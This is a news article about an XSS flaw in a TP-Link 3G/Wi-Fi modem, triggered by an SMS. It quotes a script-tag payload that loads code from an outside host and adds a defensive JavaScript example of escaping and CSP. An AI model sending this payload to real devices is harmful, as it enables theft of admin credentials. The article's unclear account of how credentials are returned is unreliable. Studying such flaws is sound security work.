TP-Link 3G/Wi-Fi Modem Spoke with Admin Login

Security researcher Jan Hörsch, from German security firm Securai, has discovered an interesting security flaw in a TP-Link product that gives up the admin login details in response to a simple but evil text message.

The vulnerability is a Cross-Site Scripting (XSS) bug that can be triggered by sending an SMS containing the following payload: <script src=//n.ms/a.js></script>


An attacker can retrieve the device’s admin credentials with a simple text message: the router replies with the admin username, the admin password, its SSID, and its login password.
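The bug class described above and its fix, as an added example that is not TP-Link's firmware code: the inbox layout, function names and sample messages are assumptions made for illustration, and only the payload string comes from the article.

```javascript
// Hypothetical SMS inbox renderer for a modem's admin web UI (assumed design).
// Sender and body arrive from the mobile network, so both are untrusted input.

// Constructed sample inbox; the second body is the payload quoted in the article.
const inbox = [
  { from: "+491700000000", body: "Your data plan renews tomorrow." },
  { from: "+491700000001", body: "<script src=//n.ms/a.js></script>" },
];

// Vulnerable pattern: untrusted text concatenated straight into markup.
function renderInboxUnsafe(messages) {
  return messages
    .map((m) => `<tr><td>${m.from}</td><td>${m.body}</td></tr>`)
    .join("\n");
}

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every network-supplied field is encoded on output.
function renderInboxSafe(messages) {
  return messages
    .map((m) => `<tr><td>${escapeHtml(m.from)}</td><td>${escapeHtml(m.body)}</td></tr>`)
    .join("\n");
}

// Defence in depth: a response header that refuses off-device script sources
// even if one output-encoding step is missed somewhere in the UI.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'";

// Regression check for UI tests: does a live <script> tag survive rendering?
function containsScriptTag(html) {
  return /<\s*script\b/i.test(html);
}

console.log("unsafe render keeps script tag:", containsScriptTag(renderInboxUnsafe(inbox)));
console.log("safe render keeps script tag:  ", containsScriptTag(renderInboxSafe(inbox)));
console.log(renderInboxSafe(inbox));
```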

TP-Link is not alone: the Panasonic BM ET200 retina scanner and a Startech modem are also prone to the same vulnerability, and the same exploit works smoothly against them.

This is not the first time for Hörsch. He had earlier done intensive research on IoT devices and found multiple vulnerabilities, and he also appeared at the last Kaspersky Security Analyst Summit with his findings.

The firm has now fixed the issue and released a patch for it. Users can download the patched firmware from the download page.